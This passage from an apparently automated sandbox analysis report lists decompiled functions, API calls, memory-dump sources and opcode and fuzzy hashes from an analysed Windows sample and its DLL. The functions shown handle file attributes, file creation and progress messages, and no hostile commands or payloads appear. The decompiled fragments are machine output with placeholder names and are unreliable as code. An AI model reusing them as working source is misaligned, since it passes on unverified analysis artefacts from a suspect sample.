                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3248276644-0
                                                                                                                • Opcode ID: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                • Instruction ID: c271629f7750957e5fd102afcb20a97c51063d27386b99ed5bca430d7485d950
                                                                                                                • Opcode Fuzzy Hash: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
                                                                                                                • Instruction Fuzzy Hash: 9201F72210592215D61277360C49D6F19848E46778317453FF813B32D2DF3CC972D0BE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA59F0, Relevance: 3.1, APIs: 2, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA5A28
                                                                                                                  • Part of subcall function 6FEA6870: _wmemcpy_s.LIBCPMTD ref: 6FEA689E
                                                                                                                  • Part of subcall function 6FEA6870: _wmemcpy_s.LIBCPMTD ref: 6FEA68BC
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA5A6A
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap_wmemcpy_s$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                • String ID:
                                                                                                                • API String ID: 1752512789-0
                                                                                                                • Opcode ID: 097be33881fe208d14f6a45faf35fe16523a0e9054168c1454b822cd08facbf0
                                                                                                                • Instruction ID: e79395942f5b1490f00c1ed58b0918c9b87646f4c4e7906829403d276159921e
                                                                                                                • Opcode Fuzzy Hash: 097be33881fe208d14f6a45faf35fe16523a0e9054168c1454b822cd08facbf0
                                                                                                                • Instruction Fuzzy Hash: 141112B1904209ABCB04DF54DD91BAF7B78FB05314F10466DF825AB2C0DB31AA04CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040139D, Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040139D(signed int _a4) {
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t15;
				signed int _t16;
				void* _t17;

				_t16 = _a4;
				while(_t16 >= 0) {
					_t6 = _t16 * 0x1c +  *0x47ead0;
					if( *((intOrPtr*)(_t16 * 0x1c +  *0x47ead0)) == 1) {
						break;
					}
					_t8 = E004015A0(_t6); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040137E(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t15 = _t16;
						_t16 = _t11;
						_t12 = _t11 - _t15;
					} else {
						_t12 = _t10 + 1;
						_t16 = _t16 + 1;
					}
					if( *((intOrPtr*)(_t17 + 0xc)) != 0) {
						 *0x476a8c =  *0x476a8c + _t12;
						SendMessageW( *(_t17 + 0x18), 0x402, MulDiv( *0x476a8c, 0x7530,  *0x476a84), 0);
					}
				}
				return 0;
			}










                                                                                                                0x0040139e
                                                                                                                0x0040140c
                                                                                                                0x004013a9
                                                                                                                0x004013b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004013b5
                                                                                                                0x004013bf
                                                                                                                0x00000000
                                                                                                                0x00401416
                                                                                                                0x004013c2
                                                                                                                0x004013c9
                                                                                                                0x004013cf
                                                                                                                0x004013d0
                                                                                                                0x004013d2
                                                                                                                0x004013d4
                                                                                                                0x004013cb
                                                                                                                0x004013cb
                                                                                                                0x004013cc
                                                                                                                0x004013cc
                                                                                                                0x004013db
                                                                                                                0x004013dd
                                                                                                                0x00401406
                                                                                                                0x00401406
                                                                                                                0x004013db
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA6870, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wmemcpy_s.LIBCPMTD ref: 6FEA689E
                                                                                                                  • Part of subcall function 6FEA91F0: _memcpy_s.LIBCPMTD ref: 6FEA9207
                                                                                                                • _wmemcpy_s.LIBCPMTD ref: 6FEA68BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _wmemcpy_s$_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1295243867-0
                                                                                                                • Opcode ID: 7d25a6922cf7dc3000df8814072b82e0c12939557189e11568725b9ac136e600
                                                                                                                • Instruction ID: e2e3bf2f1048c00ac5077d358bf537235c36eec8113cb3ac8659fb61b3737bc2
                                                                                                                • Opcode Fuzzy Hash: 7d25a6922cf7dc3000df8814072b82e0c12939557189e11568725b9ac136e600
                                                                                                                • Instruction Fuzzy Hash: B301ACB5A0424DAFCB04DF98DC81CAF7BB9AF98204F10854DF91897255D731AE61CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED1B8F, Relevance: 3.0, APIs: 2, Instructions: 35fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6FED1BAC
                                                                                                                • GetLastError.KERNEL32(?), ref: 6FED1BB8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 442123175-0
                                                                                                                • Opcode ID: 457e7d97afe0b04a20715643238e8b35276452735d789b217c9f5a7fc6690786
                                                                                                                • Instruction ID: 7c4731c880659e75ea8e211685af5c9cb8d657410f8dedb2f68279529e1964de
                                                                                                                • Opcode Fuzzy Hash: 457e7d97afe0b04a20715643238e8b35276452735d789b217c9f5a7fc6690786
                                                                                                                • Instruction Fuzzy Hash: 16F0BE31601215FBDF005EA88C04E9E3F6EEF41728F204159F900AA194E7B2A90287A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDB176, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,6FED077D,?,00000000,6FF115CC,00000000), ref: 6FEDB17C
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,6FED077D,?,00000000,6FF115CC,00000000), ref: 6FEDB188
                                                                                                                  • Part of subcall function 6FEDB1D4: GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,?), ref: 6FEDB20F
                                                                                                                  • Part of subcall function 6FEDB1D4: PathFindExtensionW.SHLWAPI(?), ref: 6FEDB229
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ExtensionFileFindModuleNamePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1764437154-0
                                                                                                                • Opcode ID: 01ffccf878f15b828e78a6513d210b5dce8fb7bcc0025536b0431dabb3d094a9
                                                                                                                • Instruction ID: d3c9c8e9895d576a36189f5413cf496c52c528550d5b539a55fd51407facaf27
                                                                                                                • Opcode Fuzzy Hash: 01ffccf878f15b828e78a6513d210b5dce8fb7bcc0025536b0431dabb3d094a9
                                                                                                                • Instruction Fuzzy Hash: 54F03071D103149FDB10AF65C408A4A7FA8AF05658F24845EF5548B651E7B2D842CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED19D8, Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(?,00000040,00000000,00000000,00000000,?,?,?,6FEAC477,?,00000008,00000008,?,00000002), ref: 6FED19F8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,6FEAC477,?,00000008,00000008,?,00000002), ref: 6FED1A05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1948546556-0
                                                                                                                • Opcode ID: e7017cf4e0790b05ada1ab6201dcbcbfc87ae0b2351332ecc2f7d0be30e96ac0
                                                                                                                • Instruction ID: e2d62e9bd91e0ce75a9376cefe7398d35be141d481839aebd13d03d6f7cccd8e
                                                                                                                • Opcode Fuzzy Hash: e7017cf4e0790b05ada1ab6201dcbcbfc87ae0b2351332ecc2f7d0be30e96ac0
                                                                                                                • Instruction Fuzzy Hash: CAE06D32114209FFDF009BA8DC05F8E7BACAF05358F20C429B501E5560D7B4EA10DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED14E1, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindCloseChangeNotification.KERNEL32(?,?,?,6FEAC37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FED14F0
                                                                                                                • GetLastError.KERNEL32(?,?,?,6FEAC37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FED1514
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                • String ID:
                                                                                                                • API String ID: 1687624791-0
                                                                                                                • Opcode ID: c93f754c776ee640386f1ead934685726df01c56f2854a89585cd0aff0e9ed3a
                                                                                                                • Instruction ID: 1a182a7b150bd401d05354e6059aee9c2ea28e5fdbf78a05e671f2f89cfea75c
                                                                                                                • Opcode Fuzzy Hash: c93f754c776ee640386f1ead934685726df01c56f2854a89585cd0aff0e9ed3a
                                                                                                                • Instruction Fuzzy Hash: 50E09232505E23ABCB145B68ED08B45FB20BF01736721C329E879569F09B70A873C6C4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E7C, Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00405E7C(WCHAR* _a4, long _a8, long _a12) {
				signed int _t6;
				void* _t7;

				_t6 = GetFileAttributesW(_a4);
				_t2 = _t6 + 1; // 0x1
				asm("sbb ecx, ecx");
				_t7 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~_t2 & _t6, 0); // executed
				return _t7;
			}





                                                                                                                0x00405e80
                                                                                                                0x00405e86
                                                                                                                0x00405e8d
                                                                                                                0x00405ea2
                                                                                                                0x00405ea8

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 415043291-0
                                                                                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E5C, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405E5C(WCHAR* _a4) {
				signed int _t3;
				int _t5;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesW(_a4, _t3 & 0xfffffffe); // executed
					return _t5;
				}
				return _t3;
			}





                                                                                                                0x00405e60
                                                                                                                0x00405e69
                                                                                                                0x00405e73
                                                                                                                0x00000000
                                                                                                                0x00405e73
                                                                                                                0x00405e79

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED17D7, Relevance: 1.7, APIs: 1, Instructions: 160fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6FED1C23: __EH_prolog3_GS.LIBCMT ref: 6FED1C2D
                                                                                                                  • Part of subcall function 6FED1C23: GetFullPathNameW.KERNEL32(?,00000104,00000040,?,00000268,6FED1850,?,00000040,?,00000040,00000104,00000000), ref: 6FED1C60
                                                                                                                • CreateFileW.KERNEL32(00000040,80000000,00000000,0000000C,00000003,?,00000000,?,00000000,?,00000040,?,00000040,00000104,00000000), ref: 6FED1977
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFullH_prolog3_NamePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 2133410154-0
                                                                                                                • Opcode ID: fb63f281c9bf1484df2b99de3dedb19e403aa55dcdb2ec8231eedd6411d0b590
                                                                                                                • Instruction ID: 1aef69a743bacf1fff7e8f3d273dc06ca868f88fcb0820d17277f0f22188d523
                                                                                                                • Opcode Fuzzy Hash: fb63f281c9bf1484df2b99de3dedb19e403aa55dcdb2ec8231eedd6411d0b590
                                                                                                                • Instruction Fuzzy Hash: 2A51D471A403199AFB14CFA4CD447E9BEA9AB4531CF30466AF428D7690D77CEA82CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED205A, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 1d29634704737622df5e706091fd587766e49ededdfacb89ced2cbda55fff33f
                                                                                                                • Instruction ID: 1329dadd7737bb8bf5c9da6d4cca255fb888d6eb16ee040286beaf89360e7387
                                                                                                                • Opcode Fuzzy Hash: 1d29634704737622df5e706091fd587766e49ededdfacb89ced2cbda55fff33f
                                                                                                                • Instruction Fuzzy Hash: B8412EB1910201DFCB48DF28C89566A7BB5BF58318F2442AEEC15DF38AE774E941CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA8AF0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _wmemcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 67063488-0
                                                                                                                • Opcode ID: fe5ec062b62dc324cfcf37bd7cfd8e4b19fa6af740b5ec721d3eae33e4c86dc9
                                                                                                                • Instruction ID: df982a8d258258890227423088dd67e54c4a2efa6b670237775daff6d02628ba
                                                                                                                • Opcode Fuzzy Hash: fe5ec062b62dc324cfcf37bd7cfd8e4b19fa6af740b5ec721d3eae33e4c86dc9
                                                                                                                • Instruction Fuzzy Hash: 8021A974E04209EFCB08DF98D5919AEBBB5FF88304F20819DD515AB3A4DB31AE41CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDAA2A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6FEDAA31
                                                                                                                  • Part of subcall function 6FEDA4DE: TlsAlloc.KERNEL32(?,6FEDAA5D,00000004,6FEDB07D,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2), ref: 6FEDA4FD
                                                                                                                  • Part of subcall function 6FEDA4DE: InitializeCriticalSection.KERNEL32(6FF1E860,?,6FEDAA5D,00000004,6FEDB07D,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2), ref: 6FEDA50E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocCriticalH_prolog3InitializeSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 2369468792-0
                                                                                                                • Opcode ID: f054fab1c51a26ba15ac2834e8beb3d8c0a718bfd05c1a1724714c3b7c1602a1
                                                                                                                • Instruction ID: 77f7c843ec6b240ff6d71204f6ceb0e9e7cc94b305094a86e8d4b55add1cbcdf
                                                                                                                • Opcode Fuzzy Hash: f054fab1c51a26ba15ac2834e8beb3d8c0a718bfd05c1a1724714c3b7c1602a1
                                                                                                                • Instruction Fuzzy Hash: 5A015E30AA17129BEB09EF74C51566D7FA1AF40B6CB244228F4108BBA1EB34EE53C754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEE2DFE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6FEE2E5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 6842923-0
                                                                                                                • Opcode ID: fc7995ec1c06f1b98ebb63bab377b8ee5d64ebd5d38ae4e316095e7c58965e42
                                                                                                                • Instruction ID: 8b5edc687b3b7462332a006172ffd576eb010986386e374d351d26f1487ad4b3
                                                                                                                • Opcode Fuzzy Hash: fc7995ec1c06f1b98ebb63bab377b8ee5d64ebd5d38ae4e316095e7c58965e42
                                                                                                                • Instruction Fuzzy Hash: 0D01A275D00219ABDB029F5CD980BAEBFB9FF58714F11405EE955AB3A0D7B0E901CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED1523, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6FED152A
                                                                                                                  • Part of subcall function 6FED11D2: __EH_prolog3.LIBCMT ref: 6FED11D9
                                                                                                                Memory Dump Source
